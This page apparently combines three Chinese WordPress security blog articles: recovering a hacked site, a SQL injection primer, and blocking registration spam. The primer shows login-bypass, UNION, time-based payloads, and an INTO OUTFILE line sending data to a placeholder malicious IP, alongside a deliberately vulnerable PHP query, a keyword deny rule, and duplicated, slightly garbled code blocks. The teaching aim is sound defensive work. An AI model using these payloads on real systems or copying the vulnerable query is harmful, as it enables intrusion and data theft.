
    如果您的浏览器警告您的网站已被入侵,则可能表明您的网站已被黑客入侵。这也可能是由于您需要删除的主题或插件中的某些代码,或者是域或SSL的问题。

    请参阅浏览器中带有警告的建议,以帮助您诊断问题。

    搜索引擎警告

    当您搜索您的网站时,如果它被黑客入侵,Google可能会显示警告。这可能意味着站点地图已被黑客入侵,这将影响Google抓取您网站的方式。或者这可能是一个更大的问题:您需要进行下面的诊断以确切了解发生了什么。

    谷歌警报 - 该网站可能已被黑客入侵

    谷歌警报 – 该网站可能已被黑客入侵

    为什么WordPress网站会被黑客入侵

    WordPress网站被黑的原因有很多,但这里是最常见因素的概述。

    1. 不安全的密码

    这是黑客入侵的最常见原因之一。世界上最常用的密码是“密码”。安全密码不仅适用于您的WordPress管理员帐户,而且适用于您的所有用户和网站的所有方面,包括FTP和托管。

    2. 过时的软件

    插件和主题,以及WordPress本身,都受到需要应用到您网站的安全更新的约束。如果您不使您的主题、插件和 WordPress 版本保持最新,那么您的网站就会容易受到攻击。

    3.不安全的代码

    并非来自可靠来源的插件和主题可能会给您的网站带来漏洞。如果您需要免费的WordPress主题或插件,请从官方主题目录安装它们。

    购买高级主题和插件时,请务必检查供应商的声誉,并从您信任的人和来源获得推荐。切勿安装无效插件,它们是来自免费网站的高级插件,旨在造成伤害或收集信息。

    WordPress如何被黑客入侵?

    如果您想了解更多有关WordPress 网站如何被黑客入侵的信息(如果您自己的网站被黑客入侵,您不会急于采取措施),以下是黑客进入您网站的主要途径:

    • 后门——这些绕过访问您网站的正常方法,例如通过脚本或隐藏文件。一个例子是2013年的Tim Thumb漏洞
    • Pharma hacks – 一种用于将恶意代码插入到过时版本的WordPress中的漏洞。
    • 暴力登录尝试——当黑客使用自动化来利用弱密码并获得对您网站的访问权限时。
    • 恶意重定向 – 当使用后门将恶意重定向添加到您的网站时。
    • 跨站脚本 (XSS) – WordPress插件中最常见的漏洞,这些注入脚本允许黑客向用户的浏览器发送恶意代码。
    • 拒绝服务 (DoS) – 当网站代码中的错误或错误被用来淹没网站,使其不再运行时。

    如果您经营的是电子商务网站,请务必阅读我们关于电子商务欺诈预防的深入指南

    这些听起来都很吓人,但是您可以采取一些措施来保护您的 WordPress 网站免受它们的侵害。首先,让我们完成当您的网站被黑客入侵时需要采取的步骤。

    WordPress网站被黑:怎么办(分步指南)

    您需要采取的步骤取决于您的网站被黑客入侵的方式,您可能不需要完成所有这些工作。我们将经历的步骤是:

    1. 不要惊慌
    2. 将您的网站置于维护模式
    3. 重置密码
    4. 使用恶意软件删除服务
    5. 更新插件和主题
    6. 删除用户
    7. 删除不需要的文件
    8. 清理您的站点地图
    9. 重新安装插件和主题
    10. 重新安装WordPress核心
    11. 清理你的数据库

    第 1 步:不要惊慌

    我知道你能对惊慌失措的人说的最糟糕的话就是“不要惊慌”。但是,如果您要能够诊断和解决问题,您需要有一个清醒的头脑。

    如果您无法正确思考,只需将您的站点置于维护模式并放置几个小时,直到您感觉平静。再一次,这听起来说起来容易做起来难,但它在这里至关重要。

    第 2 步:将您的站点置于维护模式

    您不希望访问者发现您的站点处于受损状态,也不希望他们在您修复站点时看到您的站点的外观。

    因此,如果可以,请将其置于维护模式。

    如果您现在无法登录您的WordPress网站,这将是不可能的,但请尽快返回并执行此操作。

    Coming Soon Page & Maintenance Mode这样的插件可以让您将您的网站置于维护模式,使其看起来好像正在进行定期维护,而不是在被黑客入侵后得到修复。

    Coming Soon Page & Maintenance Mode插件

    Coming Soon Page & Maintenance Mode插件

    完成此操作后,您可以放松一点,因为知道人们看不到正在发生的事情。

    您可以配置插件以添加徽标并自定义颜色,或者您可以输入一些快速解释性文本并将其保留。

    现在您可以看到损坏的网站,但其他人看不到。

    第 3 步:使用恶意软件删除服务

    为了省去以下所有步骤的麻烦,如果你的服务器提供商有恶意软件清除服务,掏腰包解决问题吧。

    第 4 步:重置密码

    由于您不知道使用哪个密码来访问您的网站,因此更改所有密码以防止黑客再次使用它们很重要。这不仅限于您的WordPress密码:重置您的SFTP密码、您的数据库密码以及您的托管服务提供商的密码。

    您需要确保其他管理员用户也重置他们的密码。

    第 5 步:更新插件和主题

    下一步是确保所有插件和主题都是最新的。转到您网站中的仪表盘 > 更新 并更新所有过时的内容。

    您应该在尝试任何其他修复之前执行此操作,因为如果插件或主题使您的网站易受攻击,则您所做的任何修复都可能被该漏洞撤消。因此,在继续之前确保一切都是最新的。

    第 6 步:删除用户

    如果您不认识任何管理员帐户已添加到您的WordPress网站,则该删除它们了。在您执行此操作之前,请与任何授权管理员确认他们没有更改其帐户详细信息,而您只是不认识他们。

    转到WordPress管理员中的用户屏幕,然后单击用户列表上方的管理员链接。如果有任何不应该出现的用户,请单击他们旁边的复选框,然后在批量操作下拉列表中选择删除 。

    第 7 步:删除不需要的文件

    要确定您的WordPress安装中是否有任何不应该存在的文件,您需要安装一个安全插件,例如WordFence,它会扫描您的网站并告诉您是否有任何不应该存在的文件,或使用诸如Sucuri之类的安全服务。

    第 8 步:清理您的站点地图并重新提交给Google

    网站被搜索引擎标记为红色的原因之一可能是您的sitemap.xml文件被黑客入侵。

    您可以使用SEO插件重新生成站点地图,但您还需要告诉Google该站点已被清理。将您的网站添加到Google Search Console并向 Google提交站点地图报告,告诉他们您需要抓取该网站。这并不能保证您的网站会立即被抓取,最多可能需要两周时间。您无法采取任何措施来加快速度,因此您必须耐心等待。

    第 9 步:重新安装插件和主题

    如果您的网站仍然存在问题,则需要重新安装尚未更新的所有插件和主题。停用并从您的主题插件页面中删除它们,然后重新安装它们。如果您尚未将站点置于维护模式,请先执行此操作!

    如果您从插件或主题供应商处购买了插件或主题并且您不确定它的安全性,那么现在是考虑是否应该继续使用它的时候了。如果您从WordPress插件或主题目录以外的任何地方下载了免费主题/插件,请不要重新安装它。相反,从主题或插件目录安装它或购买合法版本。如果您买不起,请将其替换为主题或插件目录中的免费主题/插件,该主题或插件执行相同或类似的工作。

    如果这不能解决问题,请查看所有主题和插件的支持页面。可能是其他用户遇到了问题,在这种情况下,您应该卸载该主题或插件,直到漏洞得到修复。

    第 10 步:重新安装WordPress核心

    如果一切都失败了,您将需要重新安装WordPress本身。如果WordPress核心中的文件遭到破坏,您需要用干净的WordPress安装替换它们。

    通过SFTP将一组干净的WordPress文件上传到您的网站,确保覆盖旧文件。备份wp-config.php和. htaccess文件首先,以防这些被覆盖(尽管它们不应该被覆盖)。

    如果您使用自动安装程序来安装WordPress,请不要再次使用它,因为它会覆盖您的数据库并且您会丢失您的内容。相反,仅使用SFTP上传文件。

    第 11 步:清理数据库

    您的数据库已被黑客入侵,您也需要清理它。清理数据库是一个好主意,因为干净的数据库将减少陈旧数据并占用更少的空间,从而使您的站点更快。

    你怎么知道你的数据库是否被黑客入侵了?如果您正在使用安全插件或服务,通过它运行扫描将告诉您数据库是否已被破坏(或者您可能已收到警报)。或者,您可以使用像NinjaScanner这样的插件来扫描您的数据库。

    WP-Optimize插件可让您清理数据库并为未来优化。

    如何防止您的WordPress网站被黑客入侵

    所以你已经清理了你的网站,你已经重置了你的密码,所以它比以前更安全了。

    但是,您还可以做更多的事情来防止未来的黑客攻击并避免再次发生同样的事情。

    1.确保所有密码都是安全的

    如果您还没有,请确保与您的网站相关的所有密码(不仅仅是您的 WordPress 管理员密码)都已重置,并且您使用的是强密码。

    安全插件可让您强制用户使用安全密码。

    您还可以向您的网站添加双重身份验证,以使黑客更难创建帐户。

    2.保持您的网站更新

    让您的网站保持最新很重要。每次更新您的主题、插件或WordPress本身时,您都应该运行该更新,因为它通常包含安全补丁。

    您可以通过编辑wp-config.php文件或安装插件来启用自动更新。如果您不想这样做,因为您想先测试更新,安全插件会在您需要运行更新时通知您。

    3. 不要安装不安全的插件或主题

    将来安装WordPress插件时,请确保它们已使用您的WordPress版本进行了测试,并且您从信誉良好的来源下载它们。

    始终通过主题和插件目录安装免费插件和主题:不要试图从第三方站点获取它们。如果您要购买高级主题或插件,请检查插件供应商的声誉并寻求建议。

    4.清理你的WordPress安装

    如果您安装了任何主题或插件但未激活,请删除它们。如果您的托管环境中有任何未使用的文件或旧WordPress安装,是时候删除它们了。删除您不使用的任何数据库。

    如果您的服务器上有旧的、未使用的WordPress安装,它们将特别容易受到攻击,因为您不太可能使它们保持最新状态。

    5. 在您的网站上安装SSL

    SSL将为您的站点增加一层安全性。如果您的托管服务提供商不提供免费SSL,您可以使用SSL Zen插件添加免费的Let’s Encrypt SSL。

    6.避免廉价托管

    廉价托管意味着您将与数百个其他客户端共享服务器空间。这不仅会减慢您的站点速度,还会增加其他站点之一向服务器引入不安全性的机会。

    廉价的托管服务提供商不太可能可靠地监控服务器安全性或在您的网站被黑客入侵时为您提供帮助。=

    7.设置防火墙

    安全插件或CloudflareSucuri等服务可让您为您的站点配置防火墙。这将为黑客增加额外的障碍,并减少您的网站遭到黑客攻击和DDoS 攻击的机会。

    8. 安装安全插件

    如果您在网站上安装安全插件,它会通知您任何可疑活动。这可能包括未经授权的登录或添加不应存在的文件。

    同样,请参阅插件提供的警告以找出问题所在。

    9.考虑一个安全服务

    您可能需要考虑像Sucuri这样的安全服务,它会监控您的网站并在您再次被黑客入侵时修复它。

    Sucuri

    Sucuri

    它并不便宜,但如果您的网站对您的业务收入至关重要,它可以收回成本。有不同的计划为安全修复提供不同的周转时间。Sucuri将监控您的网站,在存在安全漏洞时提醒您,并为您修复。这意味着您不必再次自己清理网站。

    或者,服务器提供商附带安全功能,包括DDoS检测、正常运行时间监控、硬件墙和无黑客保证,这意味着如果您的网站被黑客入侵,我们将为您清理它。

    小结

    让您的网站被黑是一种不愉快的体验。这意味着您的网站对用户不可用,这可能会影响您的业务。这意味着您必须迅速采取行动,这将影响您的其他活动。

    如果您的网站被黑客入侵,以下是您需要采取的步骤的回顾:

    • 重置密码。
    • 更新插件和主题。
    • 删除不应该存在的用户。
    • 删除不需要的文件。
    • 清理您的站点地图。
    • 重新安装插件和主题,以及WordPress核心。
    • 如有必要,清理您的数据库。

    请记住:按照上述步骤防止黑客攻击将避免您将来不得不再次执行所有这些操作:让您的网站尽可能安全是值得的。

  • SQL注入:WordPress用户入门指南

    SQL注入:WordPress用户入门指南

    SQL(结构化查询语言)是一种允许我们与数据库交互的语言。现代Web应用程序使用数据库来管理数据并向读者显示动态内容。

    SQL注入或SQLi是一种对Web应用程序的攻击,通过恶意SQL语句破坏其数据库。

    由于这是一种常见的攻击,让我们尝试更多地了解它是什么,它是如何发生的,以及如何保护自己免受它的侵害。

    1. 什么是SQL注入?
    2. SQL注入漏洞是如何工作的?
    3. SQL注入的类型
    4. 如何防止SQL注入
    5. WordPress中的SQL注入
    6. SQL注入是非法的吗?

    什么是SQL注入?

    SQL注入或SQLi是对Web应用程序的一种攻击,它使攻击者能够将恶意SQL语句插入到Web应用程序中,从而可能获得对数据库中敏感数据的访问权或破坏这些数据。SQL注入首先由Jeff Forristal于1998年发现。

    自发现以来的二十年里,SQL 注入一直是Web开发人员在设计应用程序时的重中之重。

    Barclaycard在2012年估计,97%的数据泄露是由SQL注入攻击引发的。即使在今天,SQL注入也很普遍,并且Web应用程序中注入攻击的严重性已得到广泛认可。它是OWASP十大最关键的 Web 应用程序安全风险之一

    SQL注入漏洞是如何工作的?

    SQL注入漏洞使攻击者可以通过使用恶意SQL语句完全访问您的应用程序的数据库。

    在本节中,我们将分享一个易受攻击的应用程序的示例。

    想象一下典型Web应用程序的工作流程,其中涉及通过用户输入的数据库请求。您通过表单获取用户输入,例如登录表单。然后,您使用用户提交的字段查询您的数据库以对其进行身份验证。对数据库的查询结构如下所示:

    select * from user_table
    where username = ‘sdaityari’
    and password = ‘mypassword’;
    select * from user_table
    where username = ‘sdaityari’
    and password = ‘mypassword’;
    select * from user_table
    where username = 'sdaityari'
    and password = 'mypassword';
    

    为简单起见,假设您将密码存储为明文。但是,对salt your passwords然后对其进行散列处理是一种很好的做法。继续前进,如果您从表单中收到用户名和密码,您可以在PHP中定义查询,如下所示:

    // Connect to SQL database
    $db_query = “select * from user_table where
    username = ‘”.$user.“‘
    AND password = ‘”.$password.“‘;”;
    // Execute query
    // Connect to SQL database
    $db_query = “select * from user_table where
    username = ‘”.$user.”‘
    AND password = ‘”.$password.”‘;”;
    // Execute query
    // Connect to SQL database
    $db_query = "select * from user_table where
    username = '".$user."'
    AND password = '".$password."';";
    // Execute query
    

    如果有人在用户名字段中输入值“admin’;–”,则变量 $db_query 生成的SQL查询将如下所示:

    select * from user_table where
    username = ‘admin’;–‘ and password = ‘mypassword’
    select * from user_table where
    username = ‘admin’;–‘ and password = ‘mypassword’
    select * from user_table where
    username = 'admin';--' and password = 'mypassword'

    这个查询有什么作用?

    SQL中的注释以双破折号 (–) 开头。结果查询仅按用户名过滤,不考虑密码。如果没有适当的安全措施来避免这种情况,您只需使用此技巧即可获得对Web应用程序的管理访问权限。

    或者,在此示例中也可以使用布尔攻击来获取访问权限。如果攻击者在密码字段中输入“password”或 1=1;–”,则查询结果如下:

    select * from user_table where
    username = ‘admin’ and
    password = ‘password’ or 1=1;–‘;
    select * from user_table where
    username = ‘admin’ and
    password = ‘password’ or 1=1;–‘;
    select * from user_table where
    username = 'admin' and
    password = 'password' or 1=1;--';
    

    在这种情况下,即使您的密码错误,您也将通过身份验证进入应用程序。如果您的网页显示数据库查询的结果,攻击者可以使用命令show tables,命令显示数据库中的表,然后根据需要选择性地删除表。

    SQL注入漫画

    SQL注入漫画(图片来源:XKCD

    XKCD的流行漫画《妈妈的剥削》展示了一位母亲与她儿子所在学校的对话,她被问到她是否真的给儿子取名为“罗伯特”);放表学生;——”。

    SQL注入的类型

    现在您已经了解了SQL注入漏洞的基础知识,让我们来探索各种类型的SQL注入攻击以及每种攻击背后的原因。

    带内SQL注入

    带内SQL注入(In-Band SQL Injection)是最简单的SQL注入形式。在这个过程中,攻击者能够使用同一通道将恶意SQL代码插入应用程序并收集结果。我们将讨论两种形式的带内SQL注入攻击:

    基于错误的攻击

    攻击者在攻击的初始阶段使用基于错误的SQL注入技术。基于错误的SQL注入背后的想法是获取有关Web应用程序遵循的数据库结构和表名的更多信息。例如,错误消息可能包含查询中包含的表名和表的列名。然后可以使用此数据来创建新的攻击。

    基于联合的攻击

    在这种方法中,攻击者使用SQL联合连接来显示来自不同表的结果。例如,如果攻击者在搜索页面上,他们可能会附加来自另一个表的结果。

    select title, link from post_table
    where id < 10
    union
    select username, password
    from user_table; –;
    select title, link from post_table
    where id < 10
    union
    select username, password
    from user_table; –;
    select title, link from post_table
    where id < 10
    union
    select username, password
    from user_table; --;
    

    推理SQL注入(SQL盲注)

    即使攻击者在SQL查询中产生错误,查询的响应也可能不会直接传输到网页。在这种情况下,攻击者需要进一步探测。

    在这种形式的SQL注入中,攻击者向数据库发送各种查询,以评估应用程序如何分析这些响应。推理SQL注入有时也称为盲SQL注入(Blind SQL Injection)。我们将在下面查看两种推理SQL注入:布尔SQL注入和基于时间的SQL注入。

    布尔攻击

    如果SQL查询导致应用程序内部未处理的错误,则生成的网页可能会引发错误、加载空白页面或部分加载。在布尔SQL注入中,攻击者通过输入尝试两个不同版本的布尔子句来评估用户输入的哪些部分易受SQL注入攻击:

    • “… and 1=1”
    • “… and 1=2”

    如果应用程序在第一种情况下正常工作,但在第二种情况下显示异常,则表明该应用程序容易受到SQL注入攻击。

    基于时间的攻击

    基于时间的SQL注入攻击还可以帮助攻击者确定Web应用程序中是否存在漏洞。攻击者利用应用程序使用的数据库管理系统的预定义的基于时间的功能。例如,在MySQL中,函数sleep()指示数据库等待一定的秒数。

    select * from comments
    WHERE post_id=1SLEEP(15);
    select * from comments
    WHERE post_id=1-SLEEP(15);
    select * from comments
    WHERE post_id=1-SLEEP(15);
    

    如果这样的查询导致延迟,攻击者就会知道它是易受攻击的。

    带外SQL注入

    如果攻击者无法通过同一渠道收集SQL注入的结果。带外SQL注入(Out-of-Band SQL Injection)技术可以用作推SQL注入技术的替代方法。

    通常,这些技术涉及将数据从数据库发送到攻击者选择的恶意位置。这个过程也高度依赖于数据库管理系统的能力。

    带外SQL注入攻击使用DBMS的外部文件处理能力。在MySQL中,可以使用LOAD_FILE()和INTO OUTFILE函数来请求MySQL将数据传输到外部源。以下是攻击者如何使用OUTFILE将查询结果发送到外部源:

    select * from post_table
    into OUTFILE ‘\\MALICIOUS_IP_ADDRESSlocation’
    select * from post_table
    into OUTFILE ‘\\MALICIOUS_IP_ADDRESSlocation’
    select * from post_table
    into OUTFILE '\\MALICIOUS_IP_ADDRESSlocation'
    

    同样,可以使用LOAD_FILE()函数从服务器读取文件并显示其内容。LOAD_FILE()和OUTFILE的组合可用于读取服务器上文件的内容,然后将其传输到不同的位置。

    如何防止SQL注入

    到目前为止,我们已经探索了Web应用程序中可能导致SQL注入攻击的漏洞。攻击者可以使用SQL注入漏洞来读取、修改甚至删除数据库的内容。

    此外,它还可以使人们能够读取服务器内任何位置的文件并将内容传输到其他地方。在本节中,我们将探索各种技术来保护您的Web应用程序和网站免受SQL注入攻击。

    转义用户输入

    一般来说,判断用户字符串是否恶意是一项艰巨的任务。因此,最好的方法是在用户输入中转义特殊字符。

    此过程使您免受SQL注入攻击。您可以在PHP中使用mysql_escape_string() function. 您还可以使用该mysqli_real_escape_string()函数在MySQL中转义字符串。

    在将输出显示为HTML时,您还需要转换字符串以确保特殊字符不会干扰HTML标记。您可以使用函数转换PHP中的特殊字符htmlspecialchars()

    使用准备好的语句

    或者,您可以使用准备好的语句来避免SQL注入。准备好的语句是SQL查询的模板,您可以在稍后阶段指定参数来执行它。这是PHP和MySQLi中的准备语句示例。

    $query = $mysql_connection->prepare(“select * from user_table where username = ? and password = ?”);
    $query->execute(array($username, $password));
    $query = $mysql_connection->prepare(“select * from user_table where username = ? and password = ?”);
    $query->execute(array($username, $password));
    $query = $mysql_connection->prepare("select * from user_table where username = ? and password = ?");
    $query->execute(array($username, $password));

    防止SQL攻击的其他安全检查

    减轻此漏洞的下一步是将对数据库的访问限制在必要的范围内。

    例如,使用特定用户将您的Web应用程序连接到DBMS,该用户只能访问相关数据库。

    限制数据库用户对服务器所有其他位置的访问。您可能还希望通过Web服务器阻止URL中的某些SQL关键字。如果您将Apache用作Web服务器,则可以在.htaccess文件中使用以下代码行向潜在的攻击者显示403 Forbidden错误。

    在使用此技术之前您应该小心,因为如果URL包含这些关键字,Apache将向读者显示错误。

    RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
    RewriteRule (.*) – [F]
    RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
    RewriteRule (.*) – [F]
    RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
    RewriteRule (.*) - [F]

    作为额外的预防提示,您应该始终使用更新的软件。发布新版本或补丁时,更新中修复的错误会在发布说明中详细说明。一旦漏洞的详细信息公之于众,运行任何软件的旧版本都可能存在风险。

    WordPress中的SQL注入

    如果您使用的是最新的WordPress核心文件,则可以避免任何SQL注入漏洞。但是,当您使用第三方主题和插件时,您的整个应用程序都会面临风险。

    您的WordPress网站的强大程度取决于其最薄弱的链接。在本节中,我们将探讨缓解WordPress中的SQL注入漏洞的关键注意事项,以及如何在现有WordPress站点上执行漏洞检查。

    WordPress的SQL注入漏洞预防

    为了减轻WordPress主题或插件中的SQL注入漏洞,您必须遵循的一条规则是在与数据库交互时始终使用现有的WordPress函数

    这些函数在WordPress开发过程中针对SQL注入漏洞进行了全面测试。例如,如果您想在帖子中添加评论,请使用wp_insert_comment() 函数,而不是将数据直接插入到wp_comments表中。

    虽然函数是可扩展的,但您有时可能需要运行复杂的查询。在这种情况下,请确保使用$wp_db 函数组。您可以在创建查询之前使用 $wpdb->prepare() 转义用户输入。

    此外,这里是在WordPress中清理数据的函数列表。这些可以帮助您转义特定类型的用户输入,例如电子邮件和URL。

    保护您的WordPress网站

    虽然WordPress本身是安全的,但过时的核心软件和无效插件等问题可能会导致漏洞。虽然除了彻底检查WordPress网站是否存在SQL注入漏洞之外别无选择,但网站的复杂性可能使这项任务具有挑战性。

    您可以使用在线扫描工具,例如ThreatPassWPScan Vulnerability Database。您可以审核您的插件以查看它们的开发是否已停止。如果它们不久前被放弃,那么在您的网站上使用它们可能不是一个好主意。

    如果您仍然需要绝对使用它们,请确保彻底测试它们的代码和功能是否存在漏洞。除此之外,请确保您遵循以下安全检查:

    • 更新PHP、WordPress核心和MySQL
    • 更新第三方插件和主题
    • 避免使用root用户连接SQL数据库
    • 限制SQL用户对敏感目录的访问
    • 使用您的服务器阻止SQL关键字
    • 将您的站点备份保存在异地,以防发生不可逆转的损坏

    这是有关WordPress安全性的详细文章和详尽的检查列表。此外,您可能希望为WordPress投资这些顶级安全插件。尽管您尽了最大努力,但如果您的WordPress网站被黑客入侵,您应该采取以下措施。

    SQL注入是非法的吗?

    绝对,是的!即使存在实际漏洞,攻击者仍在尝试访问他们无法访问的数据。

    想象一下有人把钥匙留在车里的场景。仅仅因为它被打开和无人看管就构成犯罪吗?SQLi的行为受不同国家/地区的不同法律管辖。它属于美国的《计算机欺诈和滥用法》(1986 年)英国的《计算机滥用法》(1990 年)

    97%的数据泄露始于SQL注入。如果您正在运行一个站点,您应该知道什么是SQL注入以及如何防止它们发生。幸运的是,有这个指南!

    小结

    SQL注入漏洞很久以前就被发现了。然而,一份2018年关于被黑网站的报告表明,SQLi是WordPress在XSS攻击之后最常见的网站黑客行为。为防止它们发生,您应该:

    • 了解SQL注入漏洞的工作原理
    • 探索攻击者可能使用SQLi未经授权访问您的Web应用程序的各种方式
    • 实施保护您的网站免受SQLi攻击的方法,例如转义用户输入和使用准备好的语句
    • 遵循安全检查程序

    俗话说,“宁可安全,也不要后悔!”

  • 如何拦截WordPress注册垃圾邮件(插件和策略)

    如何拦截WordPress注册垃圾邮件(插件和策略)

     

    由于WordPress广受欢迎,它是世界各地垃圾邮件发送者的热门目标。他们可能只是试图利用您的网站并获得访问权限。或者,他们可能想向您的社区发送垃圾邮件,例如用垃圾邮件主题填满您的论坛。

    如果您允许在您的WordPress网站上公开注册,您几乎肯定会遇到某种形式的垃圾邮件注册问题。

    在这篇文章中,您将学习如何使用内置的WordPress功能和免费插件来减少垃圾邮件注册。

    1. 默认的WordPress注册过程
    2. 如何拦截WordPress注册垃圾邮件

    默认的WordPress注册过程

    在我们讨论策略之前,让我们简要讨论一下默认的WordPress注册过程。

    如果您允许在您的站点上公开注册,默认的WordPress注册页面位于https://yoursite.com/wp-login.php?action=register:

    默认的WordPress注册表单

    默认的WordPress注册表单

    如您所见,没有太多可以阻止恶意行为者或机器人创建垃圾邮件注册。

    机器人可以通过将相同的公式附加到每个WordPress域直接进入您的注册页面,并且没有什么可以阻止它们填写表单字段。

    如何拦截WordPress注册垃圾邮件

    您可以使用多种不同的策略来拦截WordPress注册垃圾邮件。根据您网站的需求和问题的严重程度,您可能只需要实施其中一种策略,或者您可能需要尝试多种策略来阻止垃圾邮件。

    以下是完整的策略列表:

    1. 完全禁用WordPress注册
    2. 将验证码添加到您的注册表单
    3. 使用专用的WordPress注册垃圾邮件插件
    4. 新用户需要管理员批准
    5. 拦截恶意IP地址
    6. 更改WordPress注册URL
    7. 使用自定义WordPress注册表单插件

    完全禁用WordPress注册

    首先,如果您不需要在您的WordPress网站上公开注册,最好完全禁用注册,而不是试图打击垃圾邮件注册。

    即使您需要在您的站点上提供其他用户帐户,这并不一定意味着您需要启用公共注册。例如,如果您只需要少数人拥有自己的帐户,您可以手动为他们创建帐户,而不是让他们自己注册。

    要完全禁用WordPress上的用户注册,请转到设置 → 常规并确保未选中任何人都可以注册框:

    如何禁用WordPress注册

    如何禁用WordPress注册

    禁用注册后,任何尝试访问您的默认注册页面的人都会看到以下消息:

    禁用注册示例

    禁用注册示例

    将验证码添加到您的注册表单

    抵御用户注册垃圾邮件的另一种方法是在默认的WordPress注册表单中添加验证码

    您可以使用多种类型的CAPTCHA,但大多数人认为Google的reCAPTCHA服务是对用户最友好的一种(也称为No CAPTCHA reCAPTCHA)。它旨在对大多数合法的人类访问者不可见,同时仍向其确定可能是机器人的访问者显示验证码测试。

    要将NoCAPTCHA reCAPTCHA添加到您的WordPress注册表单,您可以使用免费的Advanced noCaptcha & invisible Captcha (v2 & v3)插件。

    要设置插件,您首先需要从Google生成一个免费的reCAPTCHA API密钥——只需输入您的网站并选择要使用的reCAPTCHA类型

    生成reCAPTCHA API密钥

    生成reCAPTCHA API密钥

    然后,您可以进入设置 → Advanced noCaptcha & invisible captcha来设置插件:

    • 选择版本(确保它与您在创建API密钥时选择的版本相匹配)。
    • 添加您的站点密钥和秘密密钥(在您提交上一个屏幕截图中的表单后,Google会为您提供这些)。
    • 选择在哪里启用您的验证码。除了您的注册表单之外,您还可以为您网站的其他部分启用它,例如您的登录表单。

    如何设置WordPress reCAPTCHA

    如何设置WordPress reCAPTCHA

    保存更改后,您应该会在注册页面上看到您的CAPTCHA表单(除非您选择了不可见的方法,在这种情况下,它只会对可疑的机器人可见):

    默认注册表单上的reCAPTCHA示例

    默认注册表单上的reCAPTCHA示例

    使用专用的WordPress注册垃圾邮件插件

    一些通用的WordPress反垃圾邮件插件可以帮助拦截WordPress注册垃圾邮件,以及其他区域的垃圾邮件,例如您的评论部分或表单提交。

    不幸的是,来自Automattic的流行Akismet评论垃圾邮件插件不适用于注册垃圾邮件,但其他一些阻止注册垃圾邮件的流行选项包括:

    同样,这些插件不仅限于注册垃圾邮件,但它们确实可以帮助您阻止垃圾邮件注册,作为其一般反垃圾邮件工作的一部分。

    新用户需要管理员批准

    如果除了垃圾邮件帐户本身之外,您还担心人们在注册后会做什么,另一个好的策略是要求管理员批准新用户。

    例如,如果您担心有人向您的bbPress论坛或BuddyPress社区发送垃圾邮件,则要求管理员批准可以避免这种情况。

    这是与CAPTCHA或其他策略结合使用的好方法:CAPTCHA将过滤掉低级别的自动垃圾邮件,您可以使用手动批准来捕获其他所有内容。

    但是,如果您有大量垃圾邮件注册并尝试自行实施此策略,您可能会发现自己在尝试对所有注册进行分类时不知所措。

    要要求新用户获得管理员批准,您可以使用免费的WP Approve User插件

    安装并激活插件后,它会立即开始工作。您现有的所有用户都将获得批准(以避免出现问题)。

    但是,新用户需要手动批准,您可以从WordPress仪表盘中的现有用户区域执行此操作:

    使用WP Approve User插件批准用户

    使用WP Approve User插件批准用户

    您还可以选择在以下情况下发送和自定义电子邮件:

    • 得到正式认可的
    • 未获批准

    您可以通过访问Settings → Approve User启用这些电子邮件并自定义其内容。

    拦截恶意IP地址

    如果您的大部分注册垃圾邮件来自相同的IP地址,您可以通过首先拦截这些IP地址访问您的站点来减少问题。

    如果您使用宝塔管理服务器,你可以通过宝塔面板后台“安全”,来添加屏蔽IP地址:

    如何使用宝塔面板拦截IP地址

    如何使用宝塔面板拦截IP地址

    大多数cPanel主机还应该为您提供IP拦截工具。

    更改WordPress注册URL

    如果您想在注册页面中添加一些“隐蔽安全”并减少低级机器人流量,您可以将注册页面的URL更改为所有WordPress站点使用的默认值。

    注册页面实际上是WordPress登录页面的一部分,因此您可以使用任何允许您更改WordPress登录URL的插件来完成此操作。

    一个不错的选择是WPS Hide Login

    安装插件后,转到设置 → WPS Hide Login以输入您的新URL。您还可以将默认URL重定向到另一个页面,例如您的404页面:

    如何更改WordPress注册URL

    如何更改WordPress注册URL

    例如,如果您将登录URL更改为yoursite.com/sneakylogin,则默认注册页面将不再起作用。您的新注册页面将是yoursite.com/sneakylogin/?action=register

    使用自定义WordPress注册表单插件

    拦截WordPress注册垃圾邮件的另一个不错的选择是使用custom WordPress registration form插件

    这些插件可以让您绕过正常的 WordPress 注册过程,还可以实现一些有用的反垃圾邮件策略,例如:

    • 自定义注册URL – 将您的注册URL更改为远离默认值可以减少一些低级别的垃圾邮件,尽管它本身不太可能阻止用户注册垃圾邮件。
    • 电子邮件确认– 这通过要求新用户确认他们的电子邮件来防止垃圾邮件用户使用虚假电子邮件。如果用户没有确认他们的电子邮件,插件将自动放弃该注册。
    • 新用户的管理员批准——这些插件通常可以帮助您从上面实现管理员批准功能。
    • 垃圾邮件预防——这些插件还可以帮助您将验证码或蜜罐字段添加到您的自定义注册表单中。

    许多通用的WordPress表单插件还包括创建具有反垃圾邮件功能的自定义注册表单的能力。但是,这里的缺点是您通常只能在高级版本中获得注册功能。如果您愿意付款,一些不错的选择是:

    让我们仔细看看如何使用User Registration和Profile Builder插件提供的两个免费解决方案。

    1. 用户注册

    当您安装免费的用户注册插件时,它会给您一个选项来自动创建位于yoursite.com/registration的自定义注册页面(您可以随时更改此 URL)。

    在注册过程中,您还有其他一些减少垃圾邮件的选项。

    首先,在插件设置的常规选项卡中,您可以使用用户登录选项下拉菜单在用户注册后要求管理员批准:

    在用户注册插件中启用管理员批准

    在用户注册插件中启用管理员批准

    您还可以转到“Integration”选项卡来设置Google reCaptcha(您需要您的API密钥——您可以按照本文前面的相同步骤进行操作):

    在用户注册插件中启用reCAPTCHA

    在用户注册插件中启用reCAPTCHA

    要在特定注册表单上启用CAPTCHA,您还需要编辑该表单并在其中启用它。编辑表单时,您还可以根据需要添加其他配置文件信息字段。

    2.配置文件生成器

    免费的Profile Builder插件遵循相同的基本方法。

    要自定义您的注册表单字段,您可以转到Profile Builder →  Form Fields。要将CAPTCHA添加到您的表单中,您可以包含一个reCAPTCHA字段,您需要在其中添加您的API密钥:

    在Profile Builder插件中添加CAPTCHA字段

    在Profile Builder插件中添加CAPTCHA字段

    然后,要显示您的自定义注册表单,您可以在您网站的任何位置添加[wppb-register] 短代码。

